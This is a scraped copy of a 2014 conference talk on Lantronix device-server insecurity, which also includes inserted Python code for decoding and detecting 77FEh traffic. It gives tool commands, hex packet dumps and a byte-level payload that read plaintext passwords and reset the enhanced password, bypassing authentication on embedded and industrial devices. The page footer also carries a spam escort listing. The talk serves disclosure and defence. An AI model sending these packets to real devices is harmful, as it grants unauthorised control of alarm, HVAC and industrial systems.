Mos Eisley Lab
Confidence 2014
Exploring treasures of 77FEh
Getting access to Lantronix devices
Vlatko Kosturjak, Diverto
@k0st
Who are you!?!!??
● Security Jedi at Diverto
  – Bringing balance to the force
● Experience
  – Offensive (Penetration tester)
  – Defensive (Developer/System Administrator/...)
  – Have code in: Nmap, Metasploit, OpenVAS, …
  – Author of free software: https://github.com/kost/
● If you trust in certificates
  – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
Agenda
● Introduction - Lantronix
● Physical access
● WTF is 77FEh?
● Vulnerabilities & Exploitation
● Recommendations
● Questions and answers
45 minutes
Lantronix
Source: www.lantronix.com
You can find them as an integral part of
● Alarms
● HVACs
● Pool monitoring systems
● Sprinkler controllers
● Hacked vacuum cleaners - Roombas
● Embedded systems
● Industrial systems
Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
What are they actually running?
● OS
  – CoBos (mostly)
  – Evolution OS/Linux
  – ThreadX
  – Linux
● Support
  – 1 or more serial ports
  – Modbus (few models)
  – 10/100 Ethernet
Physical access
● Like usual
  – Game over
● Serial access
  – No password by design
● Requirements
  – Standard TTL cable
  – BusPirate
  – ...
Connecting to serial port...
● 9600 bps 8/N/1
● Flow control: None
Most frequent services available – TCP/IP
● Web (tcp/80) – Simple web server, serving applet JAR which talks to 30718 port
● Telnet (tcp/9999) – Telnet administration interface
● 77FEh (tcp-udp/30718) – What is this?
● SNMP (udp/161) – Mostly information disclosures
Device Discovery
● Ask :)
● Look if you have physical access
● Passive
● Active/Scanning
  – Standard port scanning is fine with conservative timing
  – Broadcast UDP to specific Lantronix ports (30718)
● Beware
  – Version scanning (-sV) or running vulnerability scanners may misconfigure device
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
So, WTF is 77FEh finally?
● 0x77FE = 30718 (10)
● TCP/UDP protocol for device setup
  – Proprietary protocol
  – Used by DeviceInstaller (proprietary software from Lantronix)
● Designed for
  – Setup of device
  – Administration of device
  – Getting device info
  – Insecurity (sorry, had to write it, you'll see later ;) )
Sample 77FEh communication
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
Callouts: query setup request (4), query setup response (4), device type, MAC address of the device (6)
Interesting request – #1
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f8 ....
[v] Received 124 bytes:
0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 ............
Callouts: query setup (4), IPv4 (4), simple password in plaintext (4)
Previous work
● Metasploit
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
● Tools
  – Simple C program by jgor
    ● https://github.com/jgor/lantronix-telnet-pw
But...
● Simple password is not set
● Device still asks for password
● Further digging
  – Enhanced password in place
  – You cannot get/reset the enhanced password easily
  – Length is bigger (4->16)
  – Challenge!!!
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type             Simple Password   Enhanced Password
Length                   4                 16
Visible in query setup   yes               no
Source: Mohdafri.com
Interesting request - #2
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
0x00000020 (00032)
Callouts: query ext version request (4), simple password in plaintext (4), version (6)
Interesting request #3
● Request to query configuration
  – 000000eX
● Response to query configuration
  – 000000bX followed by 126 bytes of setup
● X = number of setup record (0 – F):
  – 0 basic setup record
    ● Simple password, IP...
  – 1 security record
    ● Enhanced password, AES key, SNMP...
  – 2 specific products / situations
  – 3 OEMs
  – ...
Wrong! Request for security record 1 provides just zero bytes!
HALF
Interesting request #4
● Request to change configuration
  – 000000cX followed by 126 bytes of setup
● Response to change configuration
  – 000000bX
● X = number of setup record (0 – F):
  – 0 basic setup record
  – 1 security record
  – 2 specific products / situations
  – 3 OEMs
Setting setup record 1 for security
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>
[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..
[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....
Callouts: set setup record 1 (security) request, SNMP community string (13), enhanced password (16)
Setting setup record 1 was successful
Enhanced password gone – no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
Authentication Algorithm Guess
Authenticate -> Enhanced Password?
  – Enhanced set -> Ask for enhanced -> Password OK -> Display setup menu
  – Enhanced not set -> Simple Password?
    – Simple set -> Ask for simple -> Password OK -> Display setup menu
    – Simple not set -> Display setup menu
New tool: lantronix-witchcraft
● 77FEh protocol implementation
● 77FEh security related utility
● All the tricks mentioned implemented
● Free software: GPL2
● Requirement: Perl
● Available at
  – https://github.com/kost/lantronix-witchcraft
Basic usage:
● Display MAC address:
  – ./lantronix-witchcraft.pl -Q <ip>
● Display simple password (up to 4 characters)
  – ./lantronix-witchcraft.pl -P <ip>
● Reset security record (together with enhanced password)
  – ./lantronix-witchcraft.pl -E <ip>
● Reset security record without AES (with enhanced password)
  – ./lantronix-witchcraft.pl -S <ip>
● Dump setup records
  – ./lantronix-witchcraft.pl -G -D <ip>
Brave enough?
● One command to rule them all
● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
  – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
Still wondering why automatic scanning is bad for Lantronix?
● Dump of setup record:
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
Correct way
● Ask
  – Someone responsible if they could have something like that
● Send broadcast query packet to 77FEh
● Identify ports 30718 open (TCP or UDP)
● Dump setup records
● Play ;)
● Check if it is still working...
  – If yes, perfect
  – If not: huh, but you should restore setup records somehow ;)
It's not about Lantronix...
● ...they warned the vendors about it in their documentation
Source: Lantronix documentation
Disclosure Problem
● It's more about vendors who implement Lantronix in their devices
● Whom to report to?
  – Lantronix – I guess they know their protocol ;)
  – OEMs – hard to find all their customers ;)
● Awareness
  – Conference
  – Tools
But maybe it could be done...
● Add white list
● Encryption/SSL?
Source: Lantronix documentation
Recommendations
● Have some other device to VPN/SSL tunnel the services
● Telnet only through VPN or other secure channel to administration interface
● Disable 77FEh if not needed
● Filter out 77FEh on network devices to only allowed ones
● Disable other unnecessary services (SNMP, telnet, etc.)
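A defender-side view of the 77FEh opcodes shown on the earlier slides (query setup f6/f7 and f8/f9, extended version f4/f5, setup records eX/cX/bX) combined with the "only allowed hosts" recommendation above: an added example written for this page, not code from the talk or from lantronix-witchcraft. The severity scale, the `inspect` alert format and the management host 192.168.9.5 are assumptions; the sample messages are constructed from the hex on the slides.

```python
"""Classify Lantronix 77FEh setup-protocol messages (tcp/udp 30718) as a
detection aid.  Added example for this write-up, not code from the talk or
from lantronix-witchcraft.  Opcodes and field offsets come from the captures
on the slides (f6/f7 query setup, f8/f9 setup incl. simple password, f4/f5
extended version, eX/cX/bX setup records); severities and the admin
allowlist are this example's own assumptions."""
from dataclasses import dataclass, field
from ipaddress import IPv4Address
from typing import Optional

PORT_77FE = 0x77FE      # 30718 decimal, the port the protocol is named after
SETUP_RECORD_LEN = 126  # setup bytes that follow a cX/bX header per the talk
RECORD_NAMES = {0: "basic setup", 1: "security", 2: "product-specific", 3: "OEM"}
# Fixed opcodes seen in the talk's captures -> (description, assumed severity)
FIXED_OPCODES = {
    0xF6: ("query setup", "low"),
    0xF7: ("query setup response (device type, MAC)", "low"),
    0xF8: ("query setup incl. simple password", "medium"),
    0xF9: ("query setup response (IPv4 + simple password in plaintext)", "high"),
    0xF4: ("query extended version", "low"),
    0xF5: ("query extended version response", "low"),
}


@dataclass
class Message:
    opcode: int
    description: str
    severity: str                 # low / medium / high (assumed scale)
    record: Optional[int] = None  # setup record number for eX / cX / bX
    fields: dict = field(default_factory=dict)


def _record(n: int) -> str:
    return RECORD_NAMES.get(n, "record %X" % n)


def classify(payload: bytes) -> Message:
    """Decode one 77FEh message; every capture in the talk starts 00 00 00 <op>."""
    if len(payload) < 4 or payload[:3] != b"\x00\x00\x00":
        raise ValueError("not a 77FEh setup message")
    op = payload[3]
    hi, lo = op >> 4, op & 0x0F
    if hi == 0xE:
        return Message(op, "query setup record %X (%s)" % (lo, _record(lo)), "medium", lo)
    if hi == 0xC:
        # Writing record 1 replaces the security record: enhanced password,
        # AES key and SNMP community become whatever the 126 bytes say.
        body = len(payload) - 4
        return Message(op, "set setup record %X (%s)" % (lo, _record(lo)),
                       "high" if lo == 1 else "medium", lo,
                       {"setup_bytes": body, "full_record": body >= SETUP_RECORD_LEN})
    if hi == 0xB:
        return Message(op, "setup record %X acknowledgement" % lo, "low", lo)
    if op not in FIXED_OPCODES:
        raise ValueError("unknown 77FEh opcode 0x%02x" % op)
    desc, sev = FIXED_OPCODES[op]
    msg = Message(op, desc, sev)
    if op == 0xF7 and len(payload) == 30:
        # In the talk's capture the 6-byte MAC is the tail of the 30-byte response.
        msg.fields["mac"] = ":".join("%02x" % b for b in payload[24:30])
    if op == 0xF9 and len(payload) >= 16:
        # Offsets from the capture: IPv4 at 4..8, 4-char simple password at 12..16.
        msg.fields["ipv4"] = str(IPv4Address(payload[4:8]))
        msg.fields["simple_password_set"] = payload[12:16].strip(b"\x00") != b""
    if op == 0xF5 and len(payload) > 16:
        # Firmware version (e.g. 5.8.8.3) starts at offset 16, NUL terminated.
        msg.fields["version"] = payload[16:].split(b"\x00", 1)[0].decode("ascii", "replace")
    return msg


def inspect(src_ip, src_port, dst_ip, dst_port, payload, allowed_admins):
    """Alert lines for one packet (empty list = nothing notable).  allowed_admins
    is the set of hosts permitted to talk 77FEh to devices (assumed policy)."""
    if PORT_77FE not in (src_port, dst_port):
        return []
    try:
        msg = classify(payload)
    except ValueError as exc:
        return ["%s -> %s: malformed 77FEh traffic (%s)" % (src_ip, dst_ip, exc)]
    alerts = []
    if dst_port == PORT_77FE and src_ip not in allowed_admins:
        alerts.append("%s -> %s: 77FEh %s from host outside admin allowlist"
                      % (src_ip, dst_ip, msg.description))
    if msg.severity == "high":
        alerts.append("%s -> %s: HIGH %s" % (src_ip, dst_ip, msg.description))
    return alerts


# Constructed sample messages built from the hex shown on the slides.
QUERY_PASSWORD = bytes.fromhex("000000f8")
PASSWORD_RESPONSE = bytes.fromhex(
    "000000f9c0a809c90000000054455354c0a809054c020000141e141e0a0a0a0acc070000") + bytes(88)
SET_SECURITY_RECORD = b"\x00\x00\x00\xc1" + bytes(34) + b"public" + bytes(86)

if __name__ == "__main__":
    for line in inspect("10.0.0.77", 40000, "192.168.9.201", PORT_77FE,
                        SET_SECURITY_RECORD, {"192.168.9.5"}):  # 192.168.9.5 = assumed admin host
        print(line)
```

Feeding the three constructed messages through `inspect` yields one allowlist alert for the password query, one HIGH alert for the plaintext-password response, and both for the security-record write.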
Summary
Source: duki@fb
Summary
● There are ways to pass beyond authentication (if 77FEh is enabled)
  – Simple passwords
  – Enhanced passwords
● Tools
  – Metasploit Lantronix modules
  – https://github.com/kost/lantronix-witchcraft
● Recommendations
  – Disable 77FEh if not needed or filter out 77FEh on network devices to only allowed ones
  – Tunnel VPN/SSL all communication to these devices
● Future
  – There are things to research: way to obtain enhanced password or AES keys for example
Acknowledgements - Thanks
● Previous work (Simple Passwords)
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● https://github.com/jgor/lantronix-telnet-pw
● Colleagues
  – Dalibor Dosegović, hardware wizard
Thank you!
Questions and Answers
@k0st

 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 

CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

  • 10. Device Discovery
    ● Ask :)
    ● Look if you have physical access
    ● Passive
    ● Active/Scanning
      – Standard port scanning is fine with conservative timing
      – Broadcast UDP to specific Lantronix ports (30718)
    ● Beware
      – Version scanning (-sV) or running vulnerability scanners may misconfigure the device
  • 11. Telnet administration
    $ telnet 192.168.1.101 9999
    Trying 192.168.1.101...
    Connected to 192.168.1.101.
    Escape character is '^]'.
    MAC address DEADDEADDEAD
    Software version V5.8.8.3 (050801) XPTEXE
    AES library version 1.8.2.1
    Password :
  • 12. So, WTF is 77FEh finally?
    ● 0x77FE = 30718 (decimal)
    ● TCP/UDP protocol for device setup
      – Proprietary protocol
      – Used by DeviceInstaller (proprietary software from Lantronix)
    ● Designed for
      – Setup of the device
      – Administration of the device
      – Getting device info
      – Insecurity (sorry, had to write it, you'll see later ;) )
  • 13. Sample 77FEh communication
    ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
    [v] Sending 4 bytes:
    0x00000000 (00000) 000000f6 ....
    [v] Received 30 bytes:
    (00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
    (00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
    Annotations on the dump: query setup request (4 bytes), query setup response (4 bytes), MAC address of the device (6 bytes), device type
  • 14. Interesting request – #1
    ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>
    [v] Sending 4 bytes:
    0x00000000 (00000) 000000f8 ....
    [v] Received 124 bytes:
    0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
    0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
    0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
    0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
    0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
    0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
    0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
    0x00000070 (00112) 00000000 00000000 00000000 ............
    Annotations on the dump: query setup (4 bytes), simple password in plaintext (4 bytes), IPv4 address (4 bytes)
  • 15. Previous work
    ● Metasploit
      – Rob Vinson
        ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
        ● https://github.com/robvinson/metasploit-modules
      – Metasploit modules for simple passwords by jgor
        ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
        ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
    ● Tools
      – Simple C program by jgor
        ● https://github.com/jgor/lantronix-telnet-pw
  • 16. But...
    ● Simple password is not set
    ● Device still asks for a password
    ● Further digging
      – Enhanced password in place
      – You cannot get/reset the enhanced password easily
      – Length is bigger (4 -> 16)
      – Challenge!!!
  • 17. Introduction to enhanced passwords
    Source: Lantronix documentation
    Feature/Type             Simple Password   Enhanced Password
    Length                   4                 16
    Visible in query setup   yes               no
  • 19. Interesting request - #2
    ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>
    [v] Sending 4 bytes:
    0x00000000 (00000) 000000f4 ....
    [v] Received 32 bytes:
    0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
    0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
    0x00000020 (00032)
    Annotations on the dump: query ext version request (4 bytes), simple password in plaintext (4 bytes), version (6 bytes)
  • 20. Interesting request #3
    ● Request to query configuration
      – 000000eX
    ● Response to query configuration
      – 000000bX, followed by 126 bytes of setup
    ● X = number of the setup record (0 – F):
      – 0 basic setup record
        ● Simple password, IP...
      – 1 security record
        ● Enhanced password, AES key, SNMP...
      – 2 specific products / situations
      – 3 OEMs
      – ...
    HALF Wrong! A request for security record 1 provides just zero bytes!
  • 21. Interesting request #4
    ● Request to change configuration
      – 000000cX, followed by 126 bytes of setup
    ● Response to change configuration
      – 000000bX
    ● X = number of the setup record (0 – F):
      – 0 basic setup record
      – 1 security record
      – 2 specific products / situations
      – 3 OEMs
  • 22. Setting setup record 1 for security
    ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>
    [v] Sending 130 bytes:
    0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
    0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
    0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
    0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
    0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
    0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
    0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
    0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
    0x00000080 (00128) 0000 ..
    [v] Received 4 bytes:
    0x00000000 (00000) 000000b1 ....
    Annotations on the dump: set setup record 1 (security) request, SNMP community string (13 bytes), enhanced password (16 bytes); setting setup record 1 was successful
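The exchanges on slides 13 to 22 (the f6/f7, f8/f9 and f4/f5 queries and the cX setup record write) as a decoder a defender can run over payloads captured on port 30718. This is an added example, not code from the talk or from lantronix-witchcraft; the field offsets are read off the annotated dumps above, the 13-byte community string position inside security record 1 is inferred from the slide 22 dump, and the sample messages are constructed from those dumps.

```python
"""Decoder and audit helper for Lantronix 77FEh (TCP/UDP 30718) messages."""
from typing import Dict, List

# 4-byte requests that carry no body; the low byte of the header is the message type
REQUESTS = {0xF6: "query setup request", 0xF8: "query setup (with password) request",
            0xF4: "query extended version request"}

def _cstr(b: bytes) -> str:
    """NUL-terminated ASCII field, decoded leniently."""
    return b.split(b"\x00", 1)[0].decode("ascii", "replace")

def decode(payload: bytes) -> Dict[str, object]:
    """Parse one 77FEh message; field offsets follow the annotated dumps on the slides."""
    if len(payload) < 4 or payload[:3] != b"\x00\x00\x00":
        raise ValueError("not a 77FEh message: expected 00 00 00 <type> header")
    op, rec = payload[3], payload[3] & 0x0F
    m: Dict[str, object] = {"opcode": op, "kind": REQUESTS.get(op, "unknown")}
    if op == 0xF7:  # 30-byte reply; the MAC is the trailing 6 bytes (00:20:4a = Lantronix OUI)
        m.update(kind="query setup response", mac=":".join(f"{x:02x}" for x in payload[-6:]))
    elif op == 0xF9:  # 124-byte reply: IPv4 at offset 4, 4-char simple password at offset 12
        m.update(kind="query setup (with password) response",
                 ip=".".join(str(x) for x in payload[4:8]), simple_password=_cstr(payload[12:16]))
    elif op == 0xF5:  # simple password at offset 12, NUL-terminated version string at offset 16
        m.update(kind="query extended version response",
                 simple_password=_cstr(payload[12:16]), version=_cstr(payload[16:32]))
    elif (op & 0xF0) == 0xE0:
        m.update(kind="query setup record request", record=rec)
    elif (op & 0xF0) == 0xC0:  # header + 126-byte record to write; no authentication at all
        m.update(kind="set setup record request", record=rec)
        if rec == 1:  # security record; community string at record offset 34 (13 bytes, inferred)
            m["snmp_community"] = _cstr(payload[4 + 34:4 + 47])
    elif (op & 0xF0) == 0xB0:
        m.update(kind="setup record response", record=rec)
    return m

def audit(payload: bytes) -> List[str]:
    """Defender view of one 77FEh packet seen on the wire: what it discloses or changes."""
    m, findings = decode(payload), []
    if m["kind"] == "set setup record request":
        findings.append(f"HIGH: unauthenticated write of setup record {m['record']}")
        if m["record"] == 1:
            findings.append("HIGH: security record rewritten (enhanced password / AES key reset)")
    elif m["kind"] == "query setup record request":
        findings.append(f"MEDIUM: dump of setup record {m['record']} requested")
    if m.get("simple_password"):
        findings.append("HIGH: simple password disclosed in cleartext")
    if "mac" in m or "version" in m:
        findings.append("LOW: device fingerprint (MAC / firmware version) disclosed")
    return findings

# Constructed samples, copied from the dumps on the slides (zero-padded where the dump was cut off)
QUERY_SETUP_RESP = bytes.fromhex("000000f7 00108005 58324400 df0e0000 62a7d944 00000000 00204a91 84fb")
PASSWORD_RESP = bytes.fromhex("000000f9 c0a809c9 00000000 54455354 c0a80905 4c020000") + b"\x00" * 100
VERSION_RESP = bytes.fromhex("000000f5 09040000 00000000 54455354 352e382e 382e3300") + b"\x00" * 8
SET_SECURITY_REQ = bytes.fromhex("000000c1") + b"\x00" * 34 + b"public" + b"\x00" * 86
```

Feeding `audit()` the bytes of every UDP or TCP segment to port 30718 from a capture turns the protocol weaknesses above into alerts: a cX write from any host that is not the designated management station is the event worth paging on.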
  • 23. Enhanced password gone, no password to enter!
    $ telnet 192.168.1.101 9999
    Trying 192.168.1.101...
    Connected to 192.168.1.101.
    Escape character is '^]'.
    MAC address DEADDEADDEAD
    Software version V5.8.8.3 (050801) XPTEXE
    AES library version 1.8.2.1
    Press Enter for Setup Mode
  • 24. Authentication Algorithm Guess
    (Flowchart; reconstructed from the node labels on the slide)
    Authenticate
      -> Enhanced password set: ask for enhanced password
      -> Enhanced password not set, simple password set: ask for simple password
      -> Enhanced not set, simple not set: display setup menu
    Password OK -> display setup menu
  • 25. New tool: lantronix-witchcraft
    ● 77FEh protocol implementation
    ● 77FEh security related utility
    ● All the tricks mentioned implemented
    ● Free software: GPL2
    ● Requirement: Perl
    ● Available at
      – https://github.com/kost/lantronix-witchcraft
  • 26. Basic usage:
    ● Display MAC address:
      – ./lantronix-witchcraft.pl -Q <ip>
    ● Display simple password (up to 4 characters)
      – ./lantronix-witchcraft.pl -P <ip>
    ● Reset security record (together with enhanced password)
      – ./lantronix-witchcraft.pl -E <ip>
    ● Reset security record without AES (with enhanced password)
      – ./lantronix-witchcraft.pl -S <ip>
    ● Dump setup records
      – ./lantronix-witchcraft.pl -G -D <ip>
  • 27. Brave enough?
    ● One command to rule them all
    ● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
      – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
  • 28. Still wondering why automatic scanning is bad for Lantronix?
    ● Dump of setup record:
    00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
    00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
    00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
    00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
    00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
  • 29. Correct way
    ● Ask
      – Someone responsible whether they could have something like that
    ● Send a broadcast query packet to 77FEh
    ● Identify hosts with port 30718 open (TCP or UDP)
    ● Dump setup records
    ● Play ;)
    ● Check if it is still working...
      – If yes, perfect
      – If not: huh, but you should restore the setup records somehow ;)
  • 30. It's not about Lantronix...
    ● ...they warned the vendors about it in their documentation
    Source: Lantronix documentation
  • 31. Disclosure Problem
    ● It's more about vendors who implement Lantronix in their devices
    ● Whom to report to?
      – Lantronix – I guess they know their protocol ;)
      – OEMs – hard to find all their customers ;)
    ● Awareness
      – Conference
      – Tools
  • 32. But maybe it could be done...
    ● Add a white list
    ● Encryption/SSL?
    Source: Lantronix documentation
  • 33. Recommendations
    ● Have some other device to VPN/SSL tunnel the services
    ● Telnet to the administration interface only through a VPN or other secure channel
    ● Disable 77FEh if not needed
    ● Filter 77FEh on network devices so that only allowed hosts can reach it
    ● Disable other unnecessary services (SNMP, telnet, etc.)
  • 35. Summary
    ● There are ways to get past authentication (if 77FEh is enabled)
      – Simple passwords
      – Enhanced passwords
    ● Tools
      – Metasploit Lantronix modules
      – https://github.com/kost/lantronix-witchcraft
    ● Recommendations
      – Disable 77FEh if not needed, or filter 77FEh on network devices so that only allowed hosts can reach it
      – Tunnel all communication to these devices over VPN/SSL
    ● Future
      – There are things to research: a way to obtain the enhanced password or the AES keys, for example
  • 36. Acknowledgements - Thanks
    ● Previous work (simple passwords)
      – Rob Vinson
        ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
        ● https://github.com/robvinson/metasploit-modules
      – Metasploit modules for simple passwords by jgor
        ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
        ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
        ● https://github.com/jgor/lantronix-telnet-pw
    ● Colleagues
      – Dalibor Dosegović, hardware wizard